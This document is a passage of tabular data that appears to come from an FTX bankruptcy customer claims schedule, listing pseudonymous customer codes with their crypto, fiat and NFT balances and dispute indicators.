| 07312155 | | SOL[.10431391], USD[0.00], USDT[0.00000001] | | |
| 07312157 | | USD[0.63] | | |
| 07312158 | | BTC[.0000782], DOGE[.075], LINK[.0948], USD[2.73], USDT[0] | | |
| 07312160 | | AUD[2.71], BRZ[16.25386584], CUSDT[14], DOGE[1575.06326248], SOL[3.33308419], TRX[2], USD[15.80] | Yes | |
| 07312162 | | BTC[0], DOGE[0], ETH[0], ETHW[0.29662211], LTC[0], SOL[0], USD[650.40] | | |
| 07312165 | | BTC[0], LINK[.07992933], USD[0.00] | | |
| 07312167 | | SUSHI[8.1378135], USDT[36] | | |
| 07312168 | | USD[995.00] | | |
| 07312170 | | USD[0.00], USDT[.897952] | | |
| 07312172 | | USD[0.00] | | |
| 07312177 | | SOL[39.42349], USD[0.93] | | |
| 07312189 | | SOL[.00833865], USDT[2.2618184] | | |
| 07312195 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0.00000149] | | |
| 07312200 | | BTC[.0000881], USD[0.14] | | |
| 07312205 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.01], USDT[0] | | |
| 07312206 | | BTC[0], ETH[0], USD[0.36], USDT[0] | | |
| 07312215 | | ETH[0], NFT (554378545087640614/FTX - Off The Grid Miami #2495)[1], SOL[0], USD[50.00] | | |
| 07312223 | | BTC[0.00003149], ETH[.00078139], ETHW[.00078139], LTC[.00389558], SOL[.006], SUSHI[156.3435], UNI[.14985], USD[73301.67] | | |
| 07312225 | | USD[0.00], USDT[.51057962] | | |
| 07312227 | | SOL[0], USD[0.00] | | |
| 07312228 | | USD[10.00] | | |
| 07312231 | | BTC[.00000001] | | |
| 07312234 | | DOGE[0], ETH[0], MATIC[0], SOL[0], USD[0.00], USDT[0.00000457] | | |
| 07312236 | | BTC[0], GRT[0], USD[0.07] | | |
| 07312238 | | USD[10.00] | | |
| 07312239 | | USD[10.00] | | |
| 07312245 | | ETH[.301698], ETHW[.301698], SOL[.752], USD[0.19], USDT[.06] | | |
| 07312247 | | USD[10.00] | | |
| 07312248 | | USD[10.00] | | |
| 07312249 | | USD[10.00] | | |
| 07312250 | | USD[10.00] | | |
| 07312255 | | ETH[.000275], ETHW[.000275], NEAR[.0073], SUSHI[.201], USD[0.00], USDT[0] | | |
| 07312262 | | NFT (354529581370318531/2363)[1], USD[0.00] | | |
| 07312265 | | BTC[0], ETH[0.00006033], NFT (384188816345063887/Cool Bean #3693)[1], NFT (506979785543868458/Sigma Shark #4321)[1], SOL[.00000001], USD[0.01] | | |
| 07312270 | | USD[490.04] | | |
| 07312274 | | BTC[0.01401881], SUSHI[0], UNI[0] | | |
| 07312277 | | USD[0.00] | | |
| 07312287 | Contingent, Disputed | BTC[0], ETH[0], SOL[0], USD[2.75], USDT[0] | | |
| 07312293 | | AAVE[.0011215], BTC[0], GRT[.06], USD[0.00] | | |
| 07312294 | | BTC[0.00004200], ETH[0], ETHW[0], MATIC[0], SOL[0], SUSHI[0], USD[0.00], WBTC[0], YFI[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07312301 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], UNI[0], USD[0.00] | | |
| 07312308 | | AAVE[.00922615], BTC[0.00193125], LTC[.00502], SOL[.00000001], SUSHI[.00000001], USD[0.00], USDT[0.00000001] | | |
| 07312309 | | BTC[0.00009954], GRT[.924], LTC[.00162488], USD[0.46] | | |
| 07312313 | | BTC[0.00007013], ETH[0.00050014], ETHW[0.00050014], USD[0.01], USDT[0] | | |
| 07312314 | | NFT (386866746783052176/Sigma Shark #4754)[1], SOL[.46] | | |
| 07312317 | | BTC[0], ETH[0], SOL[0.07795086], USD[0.00] | | |
| 07312328 | | DOGE[.711], ETH[.000176], ETHW[.000176], LINK[.0563], LTC[.00468], SUSHI[.367], USD[0.02], USDT[6.58376625] | | |
| 07312330 | | BTC[0.00051545], DOGE[0], ETH[.00097138], ETHW[.00097138], NFT (558077062320132533/Reflection '15 #99)[1], USD[0.00] | | |
| 07312339 | | NFT (411011825618339615/Monocle #33)[1], USD[0.00] | | |
| 07312342 | | USD[1568.93] | | |
| 07312352 | | BTC[0], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07312356 | | BTC[.001] | | |
| 07312357 | | BTC[.0000785], SUSHI[72.398], USD[2.61] | | |
| 07312372 | | USD[337.74], USDT[-108.49074441] | | |
| 07312381 | | USD[10.00] | | |
| 07312386 | | DOGE[671], USD[0.00], USDT[0] | | |
| 07312390 | | USD[0.00] | | |
| 07312394 | | SOL[.466645] | | |
| 07312403 | | BTC[.0044955], ETH[.667177], ETHW[.667177], TRX[36.963], USD[0.00] | | |
| 07312405 | | BTC[.17437696], LINK[7.8], USD[247.56] | | |
| 07312406 | | USD[0.00] | | |
| 07312407 | | ETH[.00299579], TRX[.020258], USDT[.051] | | |
| 07312412 | | ALGO[222.35940559], BTC[0], NFT (528388550597480868/Romeo #33)[1], USDT[0] | | |
| 07312413 | | BTC[0.04825674], DOGE[.54041526], ETH[.00000001], GRT[.268], LINK[.076], LTC[.00448], SOL[.085], SUSHI[.162], UNI[.036], USD[0.01], USDT[0.00000001], YFI[.000907] | | |
| 07312414 | | BTC[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00010784] | | |
| 07312415 | | AVAX[37.85737788], NEAR[250.21316879], SOL[53.25714822], USD[8800.57] | | |
| 07312416 | | USD[10.00] | | |
| 07312417 | | USD[10.00] | | |
| 07312418 | | AVAX[8.691735], BAT[.34719646], BTC[0.00433120], DAI[.07242515], ETHW[0.61694616], MATIC[1136.4819], SOL[8.6964055], UNI[103.401675], USD[1270.88] | | |
| 07312421 | | BTC[0], DOGE[456.25277462] | | |
| 07312422 | | BTC[.000061], ETH[.00854811], ETHW[.00854811], NFT (357138697057957107/Kitty Key)[1], SUSHI[.34] | | |
| 07312425 | | BTC[0], DOGE[0], LTC[0], SUSHI[0], USD[0.44], USDT[0] | | |
| 07312426 | | USD[10.00] | | |
| 07312428 | | BTC[.1597401], ETH[2.44755], ETHW[2.44755], MATIC[2047.95], USD[340.54] | | |
| 07312429 | | USD[0.06], USDT[8.10611751] | | |
| 07312433 | | BTC[0], USD[0.08] | | |
| 07312435 | | USD[10.00] | | |
| 07312444 | | USD[10.00] | | |
| 07312445 | | USD[10.00] | | |
| 07312446 | | SOL[.808], USD[0.43], USDT[2.213616] | | |
| 07312452 | Contingent, Disputed | BTC[0], DOGE[1], ETH[0.04322665], ETHW[0.04322665], USD[13.71] | | |
| 07312461 | | DOGE[7411.352491], ETH[.00000001], SOL[0.08093200], SUSHI[0.18985772], USD[0.50], USDT[.00884] | | |
| 07312467 | | USD[10.00] | | |
| 07312477 | | DOGE[.53], LTC[.00486165], USD[1.66] | | |
| 07312478 | | DOGE[2.31314844], USD[0.00] | | |
| 07312479 | | USD[10.00] | | |
| 07312483 | | BTC[0], USD[1.29], USDT[0] | | |
| 07312487 | | ETHW[.0091904], USD[14.89] | | |
| 07312490 | | USD[0.01], USDT[0.00000001] | | |
| 07312496 | | BTC[.0298], ETH[.988], ETHW[.988], SOL[1.08455567], USD[15.88], USDT[0] | | |
| 07312497 | | TRX[.392], USD[0.94] | | |
| 07312499 | | BTC[0.00010867], USD[10.00] | | |
| 07312500 | | BTC[.00000001], ETH[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07312503 | | BAT[0], BTC[0], ETH[0], LINK[0], NFT (292192376581378356/NEO-NINJA MINT TICKET[1], NFT (293404934577579693/NEO-NINJA MINT TICKET[1], NFT (297195886352248595/#272)[1], NFT (300830942585331164/MagicEden Vaults)[1], NFT (305860126613985419/MagicEden Vaults)[1], NFT (305952421682916502/NEO-NINJA MINT TICKET[1], NFT (306224142848229605/NEO-NINJA MINT TICKET[1], NFT (311470383187432214/NEO-NINJA MINT TICKET[1], NFT (312827030809587352/NEO-NINJA MINT TICKET[1], NFT (313668221251859900/NEO-NINJA MINT TICKET[1], NFT (314343761772174526/NEO-NINJA MINT TICKET[1], NFT (316361825422460096/NEO-NINJA MINT TICKET[1], NFT (317434148295135478/NEO-NINJA MINT TICKET[1], NFT (319094243160306941/NEO-NINJA MINT TICKET[1], NFT (320478304271258015/NEO-NINJA MINT TICKET[1], NFT (320526930597933192/NEO-NINJA MINT TICKET[1], NFT (327318897082556818/Degen Ape #7181)[1], NFT (328183531759464348/Fancy Frenchies #8461)[1], NFT (334799774459465287/NEO-NINJA MINT TICKET[1], NFT (335082023350660483/NEO-NINJA MINT TICKET[1], NFT (347665527132762966/NEO-NINJA MINT TICKET[1], NFT (353354804401071880/#1738)[1], NFT (364176917930520883/NEO-NINJA MINT TICKET[1], NFT (367534998565252747/NEO-NINJA MINT TICKET[1], NFT (374213955626592105/NEO-NINJA MINT TICKET[1], NFT (378607270114169218/NEO-NINJA MINT TICKET[1], NFT (380940144046237156/NEO-NINJA MINT TICKET[1], NFT (382514163126853098/NEO-NINJA MINT TICKET[1], NFT (387774294958342102/NEO-NINJA MINT TICKET[1], NFT (388584113286608182/Degen Ape #2103)[1], NFT (395762688965427437/NEO-NINJA MINT TICKET[1], NFT (401520726628184509/NEO-NINJA MINT TICKET[1], NFT (408212742212295100/NEO-NINJA MINT TICKET[1], NFT (413009700290283095/NEO-NINJA MINT TICKET[1], NFT (413649830810597170/NEO-NINJA MINT TICKET[1], NFT (420020567264270801/NEO-NINJA MINT TICKET[1], NFT (421562902123160969/Fancy Frenchies #2158)[1], NFT (425087675361409592/NEO-NINJA MINT TICKET[1], NFT (432656598455997427/#1312)[1], NFT (440776576937801503/NEO-NINJA MINT TICKET[1], NFT (443697970493468248/NEO-NINJA MINT TICKET[1], NFT (449845078168843949/Cyber Pharmacist 4649)[1], NFT (449846284598211443/NEO-NINJA MINT TICKET[1], NFT (454089313127544265/NEO-NINJA MINT TICKET[1], NFT (462285813388954851/NEO-NINJA MINT TICKET[1], NFT (463445217028177315/NEO-NINJA MINT TICKET[1], NFT (466132582392025419/NEO-NINJA MINT TICKET[1], NFT (467331131046584550/NEO-NINJA MINT TICKET[1], NFT (475817721610001833/NEO-NINJA MINT TICKET[1], NFT (484207034932113966/NEO-NINJA MINT TICKET[1], NFT (487023639895492155/Degen Banana #3356)[1], NFT (492219037306434367/#444)[1], NFT (496751030087071792/MagicEden Vaults)[1], NFT (503833773672421027/NEO-NINJA MINT TICKET[1], NFT (504682977810605704/MagicEden Vaults)[1], NFT (504800936269650169/Baddies #2481)[1], NFT (507043065309096955/NEO-NINJA MINT TICKET[1], NFT (509388563673721398/NEO-NINJA MINT TICKET[1], NFT (510415685262745628/NEO-NINJA MINT TICKET[1], NFT (519144082370760606/NEO-NINJA MINT TICKET[1], NFT (517888242203120272/NEO-NINJA MINT TICKET[1], NFT (521982384819187114/NEO-NINJA MINT TICKET[1], NFT (524284074740601643/NEO-NINJA MINT TICKET[1], NFT (529244068364576002/NEO-NINJA MINT TICKET[1], NFT (530359746753327406/Cyber Pharmacist 8724)[1], NFT (533431445435643438/Degen Ape #7840)[1], NFT (535921761794512661/MagicEden Vaults)[1], NFT (549216045418494220/NEO-NINJA MINT TICKET[1], NFT (552009351591749492/Fancy Frenchies #3748)[1], NFT (561789938815543981/NEO-NINJA MINT TICKET[1], NFT (568953395914876114/NEO-NINJA MINT TICKET[1], NFT (574284208646609785/NEO-NINJA MINT TICKET[1], SOL[4.38519074] USD[0] | | |
| 07312504 | | USD[1.15] | | |
| 07312510 | | NFT (444434216372556763/Coachella x FTX Weekend 1 #10032)[1] | | |
| 07312511 | | USDT[20] | | |
| 07312513 | | USD[1.53], USDT[4.74043030] | | |
| 07312515 | | SOL[0], USD[0.83], USDT[0] | | |
| 07312520 | | TRX[0], USD[0.83], USDT[0] | | |
| 07312525 | | ETH[.006], NFT (309290418537842711/Master Poisoner)[1], NFT (364540427132239358/EMP Shockwave [SE])[1], NFT (386305689649049161/Grove Guardian)[1], NFT (399914236327877713/Tome of Aetio [SE])[1], NFT (403969312886239991/Tome of Aetio [SE])[1], NFT (437800298236289160/Battle-hardened Warrior [SE])[1], NFT (496763668620317385/Scanner Array [SE])[1], NFT (519402107585030303/Paradigm Shift [SE])[1], NFT (529265365668200521/G.R.A.U.L)[1], NFT (536992347934653861/Amperage)[1], NFT (549245354310380594/Earthbreaker Cannon)[1], NFT (558214310809274287/Spectre Attack Craft [SE])[1], NFT (561889887777089288/Enhanced Blueprints [SE])[1], SOL[0], USD[0.14] | | |
| 07312533 | | DOGE[.196] | | |
| 07312537 | | SOL[0], USD[8.90] | | |
| 07312538 | | ETH[.0000001], USD[0.00] | | |
| 07312543 | | USD[10.00] | | |
| 07312544 | | USD[10.00] | | |
| 07312546 | | BTC[0.00009675], USD[6.00] | | |
| 07312551 | | BTC[0], USD[2.60] | | |
| 07312552 | | BTC[0], ETH[0.00002872], ETHW[0], USD[0.00], USDT[0] | | |
| 07312556 | | BTC[0], DAI[.00000001], ETH[0], ETHW[0], SOL[0], UNI[.00000001], USD[0.01], USDT[0.00000001] | | |
| 07312557 | | USD[0.00] | | |
| 07312558 | | BF_POINT[400], BTC[0.00006530], SOL[1.61], USD[0.74] | | |
| 07312564 | | SOL[0.00378978], USD[0.00], USDT[0] | | |
| 07312572 | | USD[12.95] | | |
| 07312580 | | USD[10.00] | | |
| 07312581 | | USD[10.00] | | |
| 07312590 | | BTC[0], DOGE[0.09794466], USD[0.00], USDT[26.29699368] | | |
| 07312592 | | BTC[0], SOL[.0014], USD[12.48], USDT[0] | | |
| 07312598 | | SOL[0] | | |
| 07312600 | | BTC[0], DOGE[0], USDT[0] | | |
| 07312604 | Contingent, Disputed | USD[0.00] | | |
| 07312607 | | BTC[0.00006180], USD[1.27] | | |
| 07312608 | | ETH[.000287], ETHW[0.00028700], USD[0.01], USDT[0.00000001] | | |
| 07312620 | | BTC[0], DAI[.00000001], DOGE[0], TRX[.692], USD[0.01], USDT[0], YFI[0] | | |
| 07312621 | | USD[0.01], USDT[.49] | | |
| 07312628 | | SOL[0], USD[0.56] | | |
| 07312638 | | USD[10.00] | | |
| 07312644 | | AAVE[0], AUD[0.00], AVAX[0], BCH[0], BTC[0.00003165], CAD[0.00], DOGE[0], ETH[0], ETHW[0.00080400], EUR[0.00], GBP[0.00], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[20160.01], USDT[0], WBTC[0], YFI[0] | | |
| 07312647 | | SOL[.024], USD[3.01] | | |
| 07312648 | | ETH[.00000001], ETHW[0] | | |
| 07312649 | | BCH[.000612], BTC[.00008323], DAI[.057701], ETH[.000996], ETHW[.00096], LINK[43.184], USD[0.00] | | |
| 07312652 | | BTC[.0001809], ETH[.01453593], ETHW[0.01453592], USD[10.00] | | |
| 07312657 | | USD[10.00] | | |
| 07312667 | | NFT (369637356665876057/Romeo #343)[1], NFT (420194572757040140/Imola Ticket Stub #636)[1], NFT (511495055394046183/Entrance Voucher #3326)[1], NFT (556853790848790800/Tubby Cat Drawing)[1], USD[0.00], USDT[0] | | |
| 07312670 | | USD[1.75] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07312675 | | DOGE[0], USD[0.00] | | |
| 07312678 | | USD[10.00] | | |
| 07312681 | | ETH[.00077], ETHW[.00077], USD[5.23], USDT[1.2807388] | | |
| 07312687 | | USD[2.38] | | |
| 07312688 | | USD[10.00] | | |
| 07312693 | | BTC[0.00003881], ETH[.00000001], ETHW[0], USD[4.96], USDT[.6623128] | | |
| 07312699 | | BTC[0], DOGE[.516], USD[0.02] | | |
| 07312700 | | BTC[0], PAXG[0.00000001] | | |
| 07312701 | | DOGE[.732], GRT[.84], SHIB[300000], SOL[90.00044247], TRX[.56], USD[0.64] | | |
| 07312702 | | DAI[0], ETH[0], LTC[0.00820000], SOL[0.00000001], UNI[.08443875], USD[0.00], USDT[0.00000001] | | |
| 07312703 | | SOL[47.51], USD[0.35] | Yes | |
| 07312705 | | GRT[0.29793596], USD[0.34] | | |
| 07312708 | | USDT[1.70826] | | |
| 07312714 | | BTC[0], ETH[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07312715 | | BCH[.33] | | |
| 07312717 | | USD[10.00] | | |
| 07312722 | | USD[10.00] | | |
| 07312723 | | USD[10.00] | | |
| 07312724 | | USD[10.00] | | |
| 07312725 | | ETH[0.00284320], ETHW[0.00284320], USD[4.54] | | |
| 07312728 | | DOGE[0], ETH[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], YFI[0] | | |
| 07312729 | Contingent, Disputed | TRX[.900016], USD[2.83], USDT[0] | | |
| 07312730 | | BTC[0], DOGE[983.0738], ETH[.00030936], ETHW[.00030936], LINK[66.0348], LTC[6.4863236], SUSHI[309.998073], USD[0.50], USDT[0.00174210] | | |
| 07312731 | | USD[2.23], USDT[.007577] | | |
| 07312741 | | DOGE[0], SOL[5], USD[0.00], USDT[0] | | |
| 07312745 | | USD[10.00] | | |
| 07312747 | | USD[0.04] | | |
| 07312749 | | NFT[548213685694645903/Spectra #741][1], USD[0.00] | | |
| 07312754 | | BTC[.0001411], ETH[.00000714], ETHW[.00000714], SHIB[83391.60308601], USD[2.40] | | |
| 07312763 | | BTC[0], SOL[0.00635000], USD[1613.12], USDT[0.00016759] | | |
| 07312764 | | BTC[0.00003287], ETH[.0008844], ETHW[4.5618844], SOL[0.00294400], SUSHI[.334], USD[1621.97], USDT[.00430519] | | |
| 07312767 | | BTC[0], DOGE[0], ETH[0], SUSHI[0.21026237], TRX[0], UNI[0], USD[0.59] | | |
| 07312770 | | BRZ[1], BTC[0.00000001], DOGE[1], LINK[1.0983386], TRX[2], USD[2.14], USDT[1.09833860] | Yes | |
| 07312771 | | USD[10.00] | | |
| 07312776 | | DOGE[1], ETH[.00031687], ETHW[.00031687], GRT[1], SHIB[1], TRX[2], USD[0.09] | Yes | |
| 07312778 | | USD[10.00] | | |
| 07312779 | | USD[10.00] | | |
| 07312780 | | BTC[0], ETH[0], MATIC[0], NFT (302674956673514880/StarAtlas Anniversary)[1], NFT (369778550193145234/StarAtlas Anniversary)[1], NFT (394924368019264743/StarAtlas Anniversary)[1], NFT (407554623801545645/StarAtlas Anniversary)[1], NFT (444804363311685834/StarAtlas Anniversary)[1], NFT (493042771112013320/FTX - Off The Grid Miami #1794)[1], NFT (532839169485677615/StarAtlas Anniversary)[1], NFT (560788764507362721/Australia Ticket Stub #855)[1], NFT (569703987450133108/StarAtlas Anniversary)[1], SOL[0.00000001], USD[0.00] | | |
| 07312782 | | USD[10.00] | | |
| 07312788 | | USD[0.00], USDT[0] | | |
| 07312789 | | NFT (350071854593687475/2974 Floyd Norman - CLE 4-0074)[1], USD[63.86], USDT[0] | | |
| 07312799 | | CUSDT[1296.303], USD[70.60], USDT[.00449995] | | |
| 07312803 | | USD[100.00] | | |
| 07312806 | | SUSHI[.1149], USD[1.00] | | |
| 07312809 | | SUSHI[.488], UNI[.0166], USD[1.95] | | |
| 07312814 | | USD[10.00] | | |
| 07312815 | | USD[10.00] | | |
| 07312816 | Contingent, Unliquidated | BTC[0], ETH[0], NEAR[.0377887], NFT (546895272386218590/2021 MLB World Series Experience + SBF Autographed Baseball (1-OF-1) (Redeemed))[1], SOL[.00599235], USD[0.00], USDT[0.00260200] | | |
| 07312817 | | ETH[.0959962], ETHW[.0959962], USD[7.06] | | |
| 07312818 | | BTC[.00000032], SHIB[4], SOL[.00034373], USD[7765.57] | Yes | |
| 07312822 | | BTC[.00011525], SOL[4.7], USD[0.63] | | |
| 07312829 | | TRX[0], USD[0.02], USDT[.028299] | | |
| 07312832 | | BTC[0.11827433], ETH[2.67804941], ETHW[2.67804941], SOL[.55847935], SUSHI[670.94080811], USD[0.00], USDT[0] | | |
| 07312833 | | BTC[.00004697], USD[0.01] | | |
| 07312836 | | USD[0.00] | | |
| 07312839 | | USD[10.00] | | |
| 07312840 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07312845 | | USD[0.00], USDT[0] | | |
| 07312848 | | DOGE[60.939], USD[0.02] | | |
| 07312850 | | USD[0.00] | Yes | |
| 07312852 | | BTC[.0000077], ETH[0], USD[0.00] | | |
| 07312854 | | ETHW[.08310378], SOL[.00000001], USD[0.00] | | |
| 07312858 | | USD[10.00] | | |
| 07312864 | | USD[10.00] | | |
| 07312865 | | USD[10.00] | | |
| 07312866 | | USD[10.00] | | |
| 07312869 | | USD[8.18] | | |
| 07312872 | | BF_POINT[1000], BTC[0], ETH[0], LTC[0], NFT (309263553168153018/Wonky Stonk #2298)[1], USD[50.84] | | |
| 07312873 | | ETH[.00000001], USD[0.51] | | |
| 07312874 | | BTC[0.00039335], CUSDT[1], DOGE[6], ETH[0], EUR[0.00], NFT (459450850166763730/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #36)[1], SOL[2.65191836], TRX[1], USD[7.21], YFI[0] | | |
| 07312876 | | LTC[.00156], USD[0.74] | | |
| 07312887 | | USD[0.00] | | |
| 07312889 | | USD[10.00] | | |
| 07312891 | Contingent, Disputed | USD[10.40] | Yes | |
| 07312893 | | USD[10.00] | | |
| 07312903 | | BTC[0] | | |
| 07312904 | | ETH[.00000001] | | |
| 07312909 | | USD[10.00] | | |
| 07312910 | | USD[10.00] | | |
| 07312912 | | USD[10.00] | | |
| 07312914 | | BTC[0] | | |
| 07312918 | | USD[10.00] | | |
| 07312922 | | ETH[.000364], ETHW[.158364], LINK[.04668418], USD[219.42], USDT[.0019156] | | |
| 07312924 | | USD[10.00] | | |
| 07312934 | | USD[0.00], USDT[0] | | |
| 07312937 | | USD[10.00] | | |
| 07312938 | | USD[10.00] | | |
| 07312939 | | USD[10.00] | | |
| 07312940 | | USD[0.00], USDT[0.00602314] | | |
| 07312944 | | USD[10.00] | | |
| 07312945 | | USD[10.00] | | |
| 07312947 | | USD[10.00] | | |
| 07312950 | | USD[0.00] | | |
| 07312952 | | CUSDT[3755.10987583], USD[16.91], USDT[.12426843] | | |
| 07312953 | | BTC[0.00004733], DOGE[69.48347560] | | |
| 07312955 | | ETH[0], USD[0.00] | | |
| 07312959 | | BTC[0], ETHW[0.00091544], USD[55989.74], USDT[0.00005840] | | |
| 07312964 | | BTC[0], DOGE[379.121], ETH[0], LINK[.8776], LTC[.05895], USD[6.00] | | |
| 07312977 | | USD[0.01] | | |
| 07312980 | | DOGE[0], LINK[1.82782114] | | |
| 07312984 | Contingent, Disputed | BTC[.00008721], USD[0.00] | | |
| 07312986 | | USD[500.00] | | |
| 07312987 | | BTC[.0004606], SUSHI[.214] | | |
| 07312988 | | DOGE[0], SOL[124.34405776], TRX[0], USD[1.07] | | |
| 07312989 | Contingent, Disputed | BTC[.00002323], USDT[18.2352465] | | |
| 07312991 | | AAVE[0.00117315], BTC[0.00000001], DOGE[0], ETH[0], LINK[0], MATIC[0], SHIB[0], SOL[0], SUSHI[0], USD[10.00], USDT[0] | | |
| 07312994 | | BTC[0], USD[0.07] | | |
| 07313000 | | BTC[0.00006912], SOL[.06], USD[0.00] | | |
| 07313003 | | BTC[0], DAI[0], DOGE[0], ETH[0], GRT[.488], SOL[0], TRX[0], UNI[.046], USD[0.00], USDT[0.00000016] | | |
| 07313006 | | USDT[0.00000002] | | |
| 07313007 | | GRT[61.45053124], MATIC[3.53047459], NFT (335602730368669003/Serum Surfers X Crypto Bahamas #146)[1], NFT (344589024682642012/Beasts #257)[1], SUSHI[7.23723213], USD[0.00] | | |
| 07313011 | | BTC[0] | | |
| 07313013 | | SOL[15.46071972], USD[-0.24] | | |
| 07313019 | | USD[3.51] | | |
| 07313022 | | USD[0.05] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07313024 | | SOL[.95487], USD[1930.67] | | |
| 07313027 | | BAT[.00000001], ETH[.00000001], TRX[.000028], USD[0.00], USDT[0.00552800], YFI[.00000001] | | |
| 07313029 | | BTC[0], DOGE[0.66722362], ETH[0.00053200], ETHW[0.00053200], LINK[0.07200000], LTC[.00212], SUSHI[0], TRX[.84], UNI[.0284], USD[2.25], USDT[0.47889645] | | |
| 07313044 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07313050 | | USD[0.00], USDT[0] | | |
| 07313057 | | BAT[.718], USD[0.00] | | |
| 07313059 | | LINK[.045], MATIC[9.6], USD[0.07], USDT[.0093318] | | |
| 07313061 | | USD[0.00] | | |
| 07313063 | | BTC[1.00004053], ETH[2.05912937], ETHW[2.05912937], USD[0.00], USDT[0.00042856] | | |
| 07313074 | | BTC[0], ETH[0], LINK[0], LTC[ 1], SUSHI[0], USD[0.00] | | |
| 07313084 | | BTC[0.01375171], SOL[0], USD[0.00] | | |
| 07313086 | | BTC[.0000812] | | |
| 07313090 | | BTC[0], ETH[.00066945], ETHW[0.00066945], USD[1.94], USDT[0.00016053] | | |
| 07313107 | | BTC[.00007019], USD[37.50] | | |
| 07313115 | | USD[0.00] | | |
| 07313118 | | DOGE[ 272], LINK[.01065771], UNI[.03630302], USDT[.07751641] | | |
| 07313124 | | BTC[.00005958], SUSHI[67.4325] | | |
| 07313132 | | BAT[25], DOGE[5.994], USD[0.55] | | |
| 07313142 | | LINK[.0589], USD[0.00], USDT[0.00001496] | | |
| 07313168 | | BTC[0], SOL[0], USD[2110.10] | | |
| 07313170 | | BTC[0], USD[0.00], USDT[0] | | |
| 07313176 | | BTC[0], ETH[0], ETHW[0], LINK[35.7642], SOL[0], USD[0.84] | | |
| 07313180 | | SOL[.00311], USD[1.05] | | |
| 07313181 | | BTC[.00016476], SOL[499.982] | | |
| 07313205 | | USD[0.00] | | |
| 07313210 | | BTC[0], ETH[0.10187945], ETHW[0.10187945], SOL[2.18002849], UNI[0], USD[0.00], USDT[0.00000674] | | |
| 07313213 | | ETH[0], USD[0.00] | | |
| 07313218 | | USD[2.14] | | |
| 07313219 | | GRT[210.71043081], USD[0.89] | | |
| 07313220 | | SUSHI[.26058275], UNI[.00761717], YFI[.0007967] | | |
| 07313221 | | SOL[.123], USD[0.00] | | |
| 07313231 | | ETHW[.000804] | | |
| 07313234 | | BTC[.00000633], DOGE[.8], ETH[.007787], ETHW[.007787], PAXG[.003486], USDT[19.13786931] | | |
| 07313239 | | SOL[0], SUSHI[.27751], UNI[0], USDT[1.6390542] | | |
| 07313251 | | NFT (402835897652277345/2384)[1], USD[0.00], USDT[0] | | |
| 07313252 | | BTC[0.00015901], ETH[.00028147], ETHW[0.00028147], USD[19.07], USDT[0.00000001] | | |
| 07313256 | Contingent, Disputed | TRX[.000002], USD[0.00], USDT[.008773] | | |
| 07313259 | | AAVE[.00000001], ETH[0], TRX[.000003], USD[0.24], USDT[0] | | |
| 07313262 | | BTC[0], DOGE[0], ETH[0], MATIC[10.69459466], SOL[0], USD[0.00], USDT[0] | | |
| 07313264 | | USD[0.00] | | |
| 07313268 | | USD[0.00], USDT[0] | | |
| 07313270 | | BTC[0], TRX[1927.022], USD[0.00], USDT[0.04028006] | | |
| 07313272 | | USD[0.00] | | |
| 07313275 | | LINK[.3], USD[0.04], USDT[0] | | |
| 07313284 | | SUSHI[.47], USDT[.2989905] | | |
| 07313294 | | BTC[.00193409], USD[0.44] | | |
| 07313297 | | BTC[.00002424], USD[0.00] | | |
| 07313298 | | NFT (435940767145109696/Entrance Voucher #4297)[1] | | |
| 07313299 | | USD[0.00], USDT[3.12843152] | | |
| 07313300 | | USD[0.92] | | |
| 07313301 | | BTC[.0000992], DOGE[249.818], SHIB[100000], TRX[.928], USD[0.00] | | |
| 07313302 | | BTC[0], USD[0.00] | | |
| 07313305 | | BTC[0.00000194], ETH[0], USD[-0.01] | | |
| 07313323 | | SUSHI[35.3651], YFI[.0119544] | | |
| 07313329 | | BTC[.0075223], SOL[.30015184], USD[0.00] | | |
| 07313331 | | BTC[0.00003800] | | |
| 07313342 | | BTC[0], ETH[0], NFT (434980014992071949/Elves of the North #4513)[1] | | |
| 07313344 | | DOGE[4.995], ETH[.0007865], ETHW[0007865], USD[0.14], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07313348 | | SHIB[300000], USD[8.27] | | |
| 07313362 | | SOL[.0036] | | |
| 07313372 | | DOGE[6.89948004], USD[0.00] | | |
| 07313385 | | DOGE[47.808], USD[0.06] | | |
| 07313395 | | USD[2.84], USDT[40] | | |
| 07313404 | | DOGE[198.84809343], SOL[0], SUSHI[.51615858], TRX[120.10249167] | | |
| 07313408 | | BTC[0.00002037], GRT[.84], SOL[.0404], TRX[.4174], USD[0.06], USDT[0] | | |
| 07313409 | | ETH[.000131], ETHW[.000131], TRX[.000005], USD[0.94], USDT[0.00000001] | | |
| 07313410 | | BTC[0.00005710], DOGE[0.55676000], ETH[0], SOL[0.00545538], SUSHI[0], USD[47.28] | | |
| 07313416 | | BTC[0.00002358], SOL[.00003091], USD[0.00] | | |
